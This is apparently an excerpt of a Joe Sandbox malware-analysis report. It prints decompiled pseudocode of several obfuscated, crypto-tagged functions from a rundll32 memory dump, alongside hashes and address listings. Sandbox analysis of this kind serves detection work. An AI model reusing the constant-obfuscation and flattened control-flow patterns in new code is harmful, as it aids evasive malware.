                                                                        0x100072cc
                                                                        0x100072d2
                                                                        0x100073e7
                                                                        0x100072d8
                                                                        0x100072da
                                                                        0x1000734a
                                                                        0x10007355
                                                                        0x10007358
                                                                        0x100072ac
                                                                        0x100072ac
                                                                        0x100072ae
                                                                        0x00000000
                                                                        0x100072ae
                                                                        0x100072dc
                                                                        0x100072e2
                                                                        0x10007326
                                                                        0x1000732e
                                                                        0x1000732b
                                                                        0x1000732b
                                                                        0x10007333
                                                                        0x10007336
                                                                        0x00000000
                                                                        0x100072e4
                                                                        0x100072ea
                                                                        0x10007311
                                                                        0x10007316
                                                                        0x10007319
                                                                        0x100072ac
                                                                        0x100072ac
                                                                        0x100072ae
                                                                        0x100072af
                                                                        0x00000000
                                                                        0x100072af
                                                                        0x100072ec
                                                                        0x100072f2
                                                                        0x00000000
                                                                        0x100072f8
                                                                        0x100072f8
                                                                        0x00000000
                                                                        0x100072f8
                                                                        0x100072f2
                                                                        0x100072ea
                                                                        0x100072e2
                                                                        0x100072da
                                                                        0x100072d2
                                                                        0x100073ef
                                                                        0x100073f8
                                                                        0x100073f8
                                                                        0x100073a2
                                                                        0x100073a7
                                                                        0x100073a9
                                                                        0x100073ae
                                                                        0x100073bc
                                                                        0x100073c1
                                                                        0x100073c6
                                                                        0x00000000
                                                                        0x100073b0
                                                                        0x100073b0
                                                                        0x00000000
                                                                        0x100073b0
                                                                        0x00000000
                                                                        0x100073c7
                                                                        0x100073c7
                                                                        0x00000000
                                                                        0x100073d3
                                                                        0x100072af

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BJ$G/T$IJ$lX$u$#$%$s
                                                                        • API String ID: 0-3663283382
                                                                        • Opcode ID: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
                                                                        • Instruction ID: 8abdfc3377e969d007f48d575ba9e8df293e221e8c990af46830db3dd983c89b
                                                                        • Opcode Fuzzy Hash: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
                                                                        • Instruction Fuzzy Hash: 849149719083419FE358CF21C58541FBBE1FBC4798F109A1DF98A962A0D7B9CA498F47
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100142E2, Relevance: 10.2, Strings: 8, Instructions: 177COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E100142E2(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				void* __ecx;
				void* _t140;
				signed int _t160;
				void* _t166;
				void* _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t188 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t140);
				_v584 = 0x92ce;
				_t196 =  &(( &_v612)[5]);
				_v584 = _v584 >> 8;
				_v584 = _v584 >> 5;
				_t166 = 0x97b55c3;
				_v584 = _v584 ^ 0x000049ba;
				_v560 = 0xd753;
				_v560 = _v560 << 0xc;
				_v560 = _v560 ^ 0x0d754d3b;
				_v564 = 0x7345;
				_v564 = _v564 + 0xffffb630;
				_v564 = _v564 ^ 0x0000444d;
				_v580 = 0xc1d6;
				_t189 = 0xd;
				_v580 = _v580 * 0x72;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 ^ 0x00004587;
				_v604 = 0xf114;
				_v604 = _v604 / _t189;
				_v604 = _v604 >> 0xd;
				_t190 = 0x7d;
				_v604 = _v604 * 0x2d;
				_v604 = _v604 ^ 0x00006087;
				_v596 = 0x254a;
				_v596 = _v596 >> 6;
				_v596 = _v596 + 0xffff3bab;
				_v596 = _v596 ^ 0x53fe3558;
				_v596 = _v596 ^ 0xac01675f;
				_v572 = 0x4b54;
				_v572 = _v572 | 0x16c6d02e;
				_v572 = _v572 ^ 0x16c6fd39;
				_v612 = 0xa42e;
				_v612 = _v612 / _t190;
				_v612 = _v612 + 0xffff9850;
				_t191 = 0x17;
				_v612 = _v612 / _t191;
				_v612 = _v612 ^ 0x0b214225;
				_v588 = 0x5e84;
				_t192 = 0x45;
				_v588 = _v588 / _t192;
				_v588 = _v588 + 0xffffd4b8;
				_v588 = _v588 ^ 0xffff9394;
				_v592 = 0x37c6;
				_v592 = _v592 ^ 0xfeb5582a;
				_v592 = _v592 + 0x4179;
				_v592 = _v592 * 0x75;
				_v592 = _v592 ^ 0x690a6987;
				_v576 = 0x500e;
				_v576 = _v576 + 0xffff7079;
				_v576 = _v576 ^ 0xffffa0e4;
				_v568 = 0xf903;
				_v568 = _v568 ^ 0x69a540ca;
				_v568 = _v568 ^ 0x69a5fd2e;
				_v600 = 0x246b;
				_v600 = _v600 >> 0xe;
				_t193 = _v576;
				_v600 = _v600 * 0x3e;
				_v600 = _v600 * 0x59;
				_v600 = _v600 ^ 0x00007c65;
				_v608 = 0x26e8;
				_v608 = _v608 * 0x78;
				_v608 = _v608 >> 9;
				_v608 = _v608 << 7;
				_v608 = _v608 ^ 0x00048f02;
				L1:
				while(_t166 != 0x6d2a7ea) {
					if(_t166 == 0x97b55c3) {
						_t166 = 0x10e2cb79;
						continue;
					}
					if(_t166 != 0x10e2cb79) {
						if(_t166 == 0x184d4ecd) {
							_t160 = E10011196(_v572, _t193, _v612,  &_v556, _v588);
							_t196 =  &(_t196[3]);
							goto L8;
						} else {
							if(_t166 == 0x2f406389) {
								return E100078F0(_t193, _v592, _v576, _v568, _v600);
							}
							if(_t166 != 0x34204f7e) {
								L16:
								if(_t166 != 0x27ada575) {
									continue;
								} else {
									return _t160;
								}
							} else {
								_v556 = 0x22c;
								_t160 = E1000C951(_v564, _t193, _v580, _v604,  &_v556, _v596);
								_t196 =  &(_t196[4]);
								L8:
								asm("sbb ecx, ecx");
								_t166 = ( ~_t160 & 0xd7924461) + 0x2f406389;
								continue;
							}
						}
						L19:
						return _t160;
					}
					_push(_t166);
					_push(_t166);
					_t160 = E100034DF(_v608);
					_t193 = _t160;
					if(_t160 != 0xffffffff) {
						_t166 = 0x34204f7e;
						continue;
					}
					goto L19;
				}
				_push(_t188);
				_push( &_v556);
				if(_a4() == 0) {
					_t166 = 0x2f406389;
					goto L16;
				} else {
					_t166 = 0x184d4ecd;
					goto L1;
				}
				goto L19;
			}




























                                                                        0x100142ec
                                                                        0x100142f3
                                                                        0x100142f5
                                                                        0x100142fc
                                                                        0x10014303
                                                                        0x10014305
                                                                        0x1001430a
                                                                        0x10014312
                                                                        0x10014315
                                                                        0x1001431c
                                                                        0x10014321
                                                                        0x10014326
                                                                        0x1001432e
                                                                        0x10014336
                                                                        0x1001433b
                                                                        0x10014343
                                                                        0x1001434b
                                                                        0x10014353
                                                                        0x1001435b
                                                                        0x1001436a
                                                                        0x1001436d
                                                                        0x10014371
                                                                        0x10014376
                                                                        0x1001437e
                                                                        0x1001438e
                                                                        0x10014392
                                                                        0x1001439c
                                                                        0x1001439f
                                                                        0x100143a3
                                                                        0x100143ab
                                                                        0x100143b3
                                                                        0x100143b8
                                                                        0x100143c0
                                                                        0x100143c8
                                                                        0x100143d0
                                                                        0x100143d8
                                                                        0x100143e0
                                                                        0x100143e8
                                                                        0x100143f8
                                                                        0x100143fc
                                                                        0x10014408
                                                                        0x1001440d
                                                                        0x10014413
                                                                        0x1001441b
                                                                        0x10014427
                                                                        0x1001442a
                                                                        0x1001442e
                                                                        0x10014436
                                                                        0x1001443e
                                                                        0x10014446
                                                                        0x1001444e
                                                                        0x1001445b
                                                                        0x1001445f
                                                                        0x10014467
                                                                        0x1001446f
                                                                        0x10014477
                                                                        0x1001447f
                                                                        0x10014487
                                                                        0x10014494
                                                                        0x100144a1
                                                                        0x100144a9
                                                                        0x100144b3
                                                                        0x100144b7
                                                                        0x100144c0
                                                                        0x100144c4
                                                                        0x100144cc
                                                                        0x100144d9
                                                                        0x100144dd
                                                                        0x100144e2
                                                                        0x100144e7
                                                                        0x00000000
                                                                        0x100144ef
                                                                        0x10014501
                                                                        0x100145a1
                                                                        0x00000000
                                                                        0x100145a1
                                                                        0x10014509
                                                                        0x10014511
                                                                        0x10014571
                                                                        0x10014576
                                                                        0x00000000
                                                                        0x10014513
                                                                        0x10014515
                                                                        0x00000000
                                                                        0x100145ea
                                                                        0x10014521
                                                                        0x100145c5
                                                                        0x100145cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014527
                                                                        0x1001452f
                                                                        0x10014546
                                                                        0x1001454b
                                                                        0x1001454e
                                                                        0x10014552
                                                                        0x1001455a
                                                                        0x00000000
                                                                        0x1001455a
                                                                        0x10014521
                                                                        0x100145f7
                                                                        0x100145f7
                                                                        0x100145f7
                                                                        0x10014587
                                                                        0x10014588
                                                                        0x10014589
                                                                        0x1001458e
                                                                        0x10014595
                                                                        0x10014597
                                                                        0x00000000
                                                                        0x10014597
                                                                        0x00000000
                                                                        0x10014595
                                                                        0x100145a8
                                                                        0x100145ad
                                                                        0x100145b7
                                                                        0x100145c3
                                                                        0x00000000
                                                                        0x100145b9
                                                                        0x100145b9
                                                                        0x00000000
                                                                        0x100145b9
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;Mu$MD$TK$e|$yA$~O 4$~O 4$&
                                                                        • API String ID: 0-3555957702
                                                                        • Opcode ID: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
                                                                        • Instruction ID: 7a5233acb4f0b7343e1caab6bffd9fb5e66aa78ce2eca496758581743dfb795c
                                                                        • Opcode Fuzzy Hash: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
                                                                        • Instruction Fuzzy Hash: 1E7166B15093029FD368CF22D94991FBBE1EBC4708F408A1DF5959A2A0D775CA49CF83
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10015AB8, Relevance: 10.2, Strings: 8, Instructions: 172COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E10015AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t155;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t182;
				intOrPtr* _t198;
				void* _t199;
				signed int* _t202;

				_push(_a16);
				_t198 = _a12;
				_push(_t198);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t155);
				_v64 = 0xce72;
				_t202 =  &(( &_v68)[6]);
				_v64 = _v64 << 9;
				_t199 = 0;
				_t182 = 0xa327820;
				_t176 = 0x1c;
				_v64 = _v64 / _t176;
				_v64 = _v64 + 0xffff8abd;
				_v64 = _v64 ^ 0x000e49bc;
				_v8 = 0xd869;
				_v8 = _v8 + 0xb7;
				_v8 = _v8 ^ 0x0000d921;
				_v36 = 0xa5f6;
				_v36 = _v36 + 0xffff8ce6;
				_t177 = 0x14;
				_v36 = _v36 / _t177;
				_v36 = _v36 ^ 0x00004e2d;
				_v40 = 0xc3ca;
				_v40 = _v40 + 0x908a;
				_t178 = 0x63;
				_v40 = _v40 / _t178;
				_v40 = _v40 ^ 0x00006c32;
				_v44 = 0xe24;
				_v44 = _v44 << 7;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00f05026;
				_v24 = 0x7d7;
				_v24 = _v24 + 0xffffb711;
				_v24 = _v24 ^ 0xffffb7a2;
				_v48 = 0x8d07;
				_v48 = _v48 + 0xfffff854;
				_v48 = _v48 + 0xffffd8f0;
				_v48 = _v48 ^ 0x00001ba2;
				_v68 = 0x8813;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0x19ce;
				_v68 = _v68 << 6;
				_v68 = _v68 ^ 0x0006522a;
				_v20 = 0x1e4f;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x003cb9d6;
				_v60 = 0xca0;
				_v60 = _v60 * 0x63;
				_v60 = _v60 ^ 0x63869485;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x1c13f119;
				_v28 = 0xf08e;
				_v28 = _v28 + 0x10ed;
				_v28 = _v28 + 0xa702;
				_v28 = _v28 ^ 0x0001ca56;
				_v52 = 0x57f8;
				_v52 = _v52 << 0xc;
				_v52 = _v52 >> 0xa;
				_t179 = 0x4c;
				_v52 = _v52 / _t179;
				_v52 = _v52 ^ 0x00006698;
				_v32 = 0xdab;
				_v32 = _v32 << 0xc;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x56475ce6;
				_v12 = 0xaec1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0000705e;
				_v16 = 0x4e43;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x001eb931;
				_v56 = 0x98b0;
				_v56 = _v56 + 0xe89c;
				_v56 = _v56 + 0xb4ee;
				_v56 = _v56 + 0xffffbf3b;
				_v56 = _v56 ^ 0x0001c98f;
				while(_t182 != 0xa327820) {
					if(_t182 == 0x239384b6) {
						E100069FC( &_v4, _v28, _v52, _v32, _v8, _v12, _t182, _a8, _t199, _t182, _t182, _v16, _v56);
						 *_t198 = _v4;
					} else {
						if(_t182 == 0x352093e2) {
							_push(_t182);
							_t199 = E100157E8(_v4);
							if(_t199 != 0) {
								_t182 = 0x239384b6;
								continue;
							}
						} else {
							if(_t182 != 0x3a4d2a27) {
								L10:
								if(_t182 != 0x12c90a5a) {
									continue;
								} else {
								}
							} else {
								_t175 = E100069FC( &_v4, _v36, _v40, _v44, _v64, _v24, _t182, _a8, 0, _t182, _t182, _v48, _v68);
								_t202 =  &(_t202[0xb]);
								if(_t175 != 0) {
									_t182 = 0x352093e2;
									continue;
								}
							}
						}
					}
					return _t199;
				}
				_t182 = 0x3a4d2a27;
				goto L10;
			}






























                                                                        0x10015abf
                                                                        0x10015ac3
                                                                        0x10015ac7
                                                                        0x10015ac8
                                                                        0x10015acc
                                                                        0x10015ad0
                                                                        0x10015ad1
                                                                        0x10015ad2
                                                                        0x10015ad7
                                                                        0x10015adf
                                                                        0x10015ae2
                                                                        0x10015aed
                                                                        0x10015aef
                                                                        0x10015af6
                                                                        0x10015afb
                                                                        0x10015b01
                                                                        0x10015b09
                                                                        0x10015b11
                                                                        0x10015b19
                                                                        0x10015b21
                                                                        0x10015b29
                                                                        0x10015b31
                                                                        0x10015b3d
                                                                        0x10015b42
                                                                        0x10015b48
                                                                        0x10015b50
                                                                        0x10015b58
                                                                        0x10015b64
                                                                        0x10015b67
                                                                        0x10015b6b
                                                                        0x10015b73
                                                                        0x10015b7b
                                                                        0x10015b85
                                                                        0x10015b89
                                                                        0x10015b91
                                                                        0x10015b99
                                                                        0x10015ba1
                                                                        0x10015ba9
                                                                        0x10015bb1
                                                                        0x10015bb9
                                                                        0x10015bc1
                                                                        0x10015bc9
                                                                        0x10015bd1
                                                                        0x10015bd6
                                                                        0x10015bde
                                                                        0x10015be3
                                                                        0x10015beb
                                                                        0x10015bf3
                                                                        0x10015bf8
                                                                        0x10015c00
                                                                        0x10015c0d
                                                                        0x10015c11
                                                                        0x10015c19
                                                                        0x10015c1e
                                                                        0x10015c26
                                                                        0x10015c2e
                                                                        0x10015c36
                                                                        0x10015c3e
                                                                        0x10015c46
                                                                        0x10015c4e
                                                                        0x10015c53
                                                                        0x10015c60
                                                                        0x10015c6d
                                                                        0x10015c71
                                                                        0x10015c79
                                                                        0x10015c81
                                                                        0x10015c8b
                                                                        0x10015c8f
                                                                        0x10015c97
                                                                        0x10015c9f
                                                                        0x10015ca4
                                                                        0x10015cac
                                                                        0x10015cb9
                                                                        0x10015cbd
                                                                        0x10015cc5
                                                                        0x10015ccd
                                                                        0x10015cd5
                                                                        0x10015cdd
                                                                        0x10015ce5
                                                                        0x10015ced
                                                                        0x10015cf7
                                                                        0x10015d92
                                                                        0x10015d9e
                                                                        0x10015cf9
                                                                        0x10015cfb
                                                                        0x10015d46
                                                                        0x10015d50
                                                                        0x10015d55
                                                                        0x10015d57
                                                                        0x00000000
                                                                        0x10015d57
                                                                        0x10015cfd
                                                                        0x10015d03
                                                                        0x10015d60
                                                                        0x10015d66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10015d68
                                                                        0x10015d05
                                                                        0x10015d2e
                                                                        0x10015d33
                                                                        0x10015d38
                                                                        0x10015d3a
                                                                        0x00000000
                                                                        0x10015d3a
                                                                        0x10015d38
                                                                        0x10015d03
                                                                        0x10015cfb
                                                                        0x10015da9
                                                                        0x10015da9
                                                                        0x10015d5b
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x2$ x2$'*M:$'*M:$2l$CN$^p$\GV
                                                                        • API String ID: 0-2340335227
                                                                        • Opcode ID: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
                                                                        • Instruction ID: 479a953338cc6602b0d49e08dd5106ea6703caedab1e58faf33a3fe997809444
                                                                        • Opcode Fuzzy Hash: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
                                                                        • Instruction Fuzzy Hash: C7710EB25093819FE354CF60C98991FBBE1FB98758F505A1CF2D54A2A0D3B6C949CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000421E, Relevance: 9.1, Strings: 7, Instructions: 309COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E1000421E() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t360;
				void* _t366;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int* _t420;

				_t420 =  &_v1184;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t366 = 0x68d33d8;
				_v1056 = 0x2e288a;
				_v1052 = 0x75c5fe;
				_v1084 = 0xa8f5;
				_t408 = 0x17;
				_v1084 = _v1084 / _t408;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x001d0b4a;
				_v1112 = 0x1fad;
				_v1112 = _v1112 + 0x32f;
				_v1112 = _v1112 | 0xebab1cec;
				_v1112 = _v1112 ^ 0xebab1aef;
				_v1160 = 0x54dd;
				_t409 = 0x5b;
				_v1160 = _v1160 / _t409;
				_v1160 = _v1160 + 0xffff837a;
				_v1160 = _v1160 >> 0xd;
				_v1160 = _v1160 ^ 0x00079eb6;
				_v1064 = 0x3be9;
				_v1064 = _v1064 + 0xc5e5;
				_v1064 = _v1064 ^ 0x0001038f;
				_v1152 = 0xf3a;
				_v1152 = _v1152 >> 2;
				_v1152 = _v1152 | 0xf0e2a687;
				_v1152 = _v1152 ^ 0xf0e2f519;
				_v1104 = 0x6a02;
				_v1104 = _v1104 ^ 0xd79757ec;
				_v1104 = _v1104 ^ 0x72111d97;
				_v1104 = _v1104 ^ 0xa58624a2;
				_v1180 = 0x1edb;
				_v1180 = _v1180 << 8;
				_v1180 = _v1180 | 0xc66b0f2d;
				_t410 = 0x2a;
				_v1180 = _v1180 * 0x59;
				_v1180 = _v1180 ^ 0x02748563;
				_v1184 = 0xc21d;
				_v1184 = _v1184 + 0xffff4953;
				_v1184 = _v1184 + 0x9d58;
				_v1184 = _v1184 + 0xffffc405;
				_v1184 = _v1184 ^ 0x000079fa;
				_v1068 = 0xa3cf;
				_v1068 = _v1068 << 0xd;
				_v1068 = _v1068 ^ 0x1479d59b;
				_v1096 = 0x8d67;
				_v1096 = _v1096 / _t410;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 ^ 0x00006505;
				_v1076 = 0xcc46;
				_t411 = 0x5a;
				_v1076 = _v1076 * 0x1b;
				_v1076 = _v1076 ^ 0x0015fa07;
				_v1172 = 0x912b;
				_v1172 = _v1172 ^ 0x3d1f1ee2;
				_v1172 = _v1172 + 0x5bc5;
				_v1172 = _v1172 + 0xeec;
				_v1172 = _v1172 ^ 0x3d1fd618;
				_v1088 = 0xd14f;
				_v1088 = _v1088 / _t411;
				_v1088 = _v1088 << 2;
				_v1088 = _v1088 ^ 0x00001f20;
				_v1060 = 0x3e83;
				_v1060 = _v1060 ^ 0xd304f88f;
				_v1060 = _v1060 ^ 0xd304fa7e;
				_v1168 = 0xb05c;
				_v1168 = _v1168 << 8;
				_t412 = 0x34;
				_v1168 = _v1168 / _t412;
				_v1168 = _v1168 ^ 0xc0861c97;
				_v1168 = _v1168 ^ 0xc0851309;
				_v1108 = 0xe1c2;
				_v1108 = _v1108 ^ 0xa90fabc2;
				_v1108 = _v1108 | 0xcfc04e49;
				_v1108 = _v1108 ^ 0xefcf6bdd;
				_v1140 = 0x68db;
				_t413 = 0x4f;
				_v1140 = _v1140 / _t413;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 ^ 0x00007a7a;
				_v1176 = 0x96b;
				_v1176 = _v1176 | 0xfb94fdcf;
				_v1176 = _v1176 << 2;
				_v1176 = _v1176 ^ 0xee53e864;
				_v1124 = 0x2254;
				_v1124 = _v1124 ^ 0xa48881a1;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x451fa827;
				_v1100 = 0x5734;
				_v1100 = _v1100 ^ 0x74517f62;
				_t414 = 7;
				_v1100 = _v1100 * 0x13;
				_v1100 = _v1100 ^ 0xa205a981;
				_v1132 = 0x66ff;
				_v1132 = _v1132 * 0x1f;
				_v1132 = _v1132 + 0xf308;
				_v1132 = _v1132 ^ 0x000d172f;
				_v1080 = 0x2972;
				_v1080 = _v1080 * 0x38;
				_v1080 = _v1080 ^ 0x000935ad;
				_v1116 = 0x9ff8;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 + 0xfffff067;
				_v1116 = _v1116 ^ 0xffff9674;
				_v1092 = 0x2f3f;
				_v1092 = _v1092 ^ 0x892685f6;
				_v1092 = _v1092 + 0xffff53b4;
				_v1092 = _v1092 ^ 0x8925829b;
				_v1164 = 0xb542;
				_v1164 = _v1164 | 0x5ab5abdf;
				_v1164 = _v1164 + 0xffffa79d;
				_v1164 = _v1164 / _t414;
				_v1164 = _v1164 ^ 0x0cf5716d;
				_v1144 = 0x47b6;
				_v1144 = _v1144 * 0x4c;
				_v1144 = _v1144 | 0xf71f6dca;
				_v1144 = _v1144 ^ 0xf71f15ee;
				_v1072 = 0x81ab;
				_v1072 = _v1072 * 0x49;
				_v1072 = _v1072 ^ 0x00249dbb;
				_v1148 = 0xb5d2;
				_v1148 = _v1148 * 0x6d;
				_t415 = 0x2c;
				_v1148 = _v1148 / _t415;
				_v1148 = _v1148 ^ 0x0001b92b;
				_v1120 = 0xe5fa;
				_v1120 = _v1120 >> 0x10;
				_v1120 = _v1120 >> 9;
				_v1120 = _v1120 ^ 0x00005e7f;
				_v1156 = 0xab36;
				_t416 = 0x43;
				_v1156 = _v1156 / _t416;
				_v1156 = _v1156 >> 5;
				_v1156 = _v1156 << 6;
				_v1156 = _v1156 ^ 0x000049b3;
				_v1128 = 0xa89e;
				_t417 = 0x13;
				_v1128 = _v1128 * 0x34;
				_v1128 = _v1128 / _t417;
				_v1128 = _v1128 ^ 0x0001a301;
				_v1136 = 0xcc9;
				_v1136 = _v1136 + 0xe654;
				_v1136 = _v1136 * 0x71;
				_v1136 = _v1136 ^ 0x006b6140;
				do {
					while(_t366 != 0x68d33d8) {
						if(_t366 == 0xa2fd3bc) {
							_push(0x10001000);
							_push(_v1152);
							E100163BF(E1001BF25(_v1160, _v1064, __eflags), __eflags, _v1180, _v1184,  &_v520,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1096);
							E1001C5F7(_v1076, _v1172, _v1088, _v1060, _t346);
							_t420 =  &(_t420[0xb]);
							_t366 = 0xcdbf6e0;
							continue;
						}
						if(_t366 == 0xcdbf6e0) {
							E10007C9A( &_v1040, _v1168, _t366, _v1108, _v1140);
							E1001BAE0( &_v1040,  &_v1040,  &_v1040);
							E10013D7C( &_v1040, __eflags, _v1116, _v1092,  &_v520);
							_t420 =  &(_t420[9]);
							_t366 = 0x3500b19e;
							continue;
						}
						if(_t366 == 0x24c46d14) {
							_t360 = E10018F65();
							L10:
							_t366 = 0xa2fd3bc;
							continue;
						}
						if(_t366 == 0x304a50c6) {
							_t360 = E1000704B();
							goto L10;
						}
						if(_t366 != 0x3500b19e) {
							goto L17;
						}
						 *((short*)(E10001E13(_v1164, _v1144, _v1072, _v1148,  &_v520))) = 0;
						_t281 =  &_v1156; // 0x6b6140
						return E1001BE71(_v1120,  &_v520,  *_t281, _v1128, _v1136);
					}
					__eflags =  *((intOrPtr*)( *0x100221b0 + 0x22c));
					if(__eflags == 0) {
						_t366 = 0x24c46d14;
						goto L17;
					}
					_t366 = 0x304a50c6;
					continue;
					L17:
					__eflags = _t366 - 0x360d39a3;
				} while (__eflags != 0);
				return _t360;
			}






















































                                                                        0x1000421e
                                                                        0x10004224
                                                                        0x1000422e
                                                                        0x10004236
                                                                        0x1000423b
                                                                        0x10004246
                                                                        0x10004251
                                                                        0x10004263
                                                                        0x10004268
                                                                        0x1000426e
                                                                        0x10004273
                                                                        0x1000427b
                                                                        0x10004283
                                                                        0x1000428b
                                                                        0x10004293
                                                                        0x1000429b
                                                                        0x100042a7
                                                                        0x100042ac
                                                                        0x100042b2
                                                                        0x100042ba
                                                                        0x100042bf
                                                                        0x100042c7
                                                                        0x100042d2
                                                                        0x100042dd
                                                                        0x100042e8
                                                                        0x100042f0
                                                                        0x100042f5
                                                                        0x100042fd
                                                                        0x10004305
                                                                        0x1000430d
                                                                        0x10004315
                                                                        0x1000431d
                                                                        0x10004325
                                                                        0x1000432d
                                                                        0x10004332
                                                                        0x1000433f
                                                                        0x10004342
                                                                        0x10004346
                                                                        0x1000434e
                                                                        0x10004356
                                                                        0x1000435e
                                                                        0x10004366
                                                                        0x1000436e
                                                                        0x10004376
                                                                        0x10004381
                                                                        0x10004389
                                                                        0x10004394
                                                                        0x100043a4
                                                                        0x100043a8
                                                                        0x100043ad
                                                                        0x100043b5
                                                                        0x100043c8
                                                                        0x100043c9
                                                                        0x100043cd
                                                                        0x100043d5
                                                                        0x100043dd
                                                                        0x100043e5
                                                                        0x100043ed
                                                                        0x100043f5
                                                                        0x100043fd
                                                                        0x1000440b
                                                                        0x10004411
                                                                        0x10004416
                                                                        0x1000441e
                                                                        0x10004429
                                                                        0x10004434
                                                                        0x1000443f
                                                                        0x10004447
                                                                        0x10004452
                                                                        0x10004457
                                                                        0x1000445d
                                                                        0x10004465
                                                                        0x1000446d
                                                                        0x10004475
                                                                        0x1000447d
                                                                        0x10004485
                                                                        0x1000448d
                                                                        0x10004499
                                                                        0x1000449e
                                                                        0x100044a4
                                                                        0x100044a9
                                                                        0x100044b1
                                                                        0x100044b9
                                                                        0x100044c1
                                                                        0x100044c6
                                                                        0x100044ce
                                                                        0x100044d6
                                                                        0x100044de
                                                                        0x100044e3
                                                                        0x100044eb
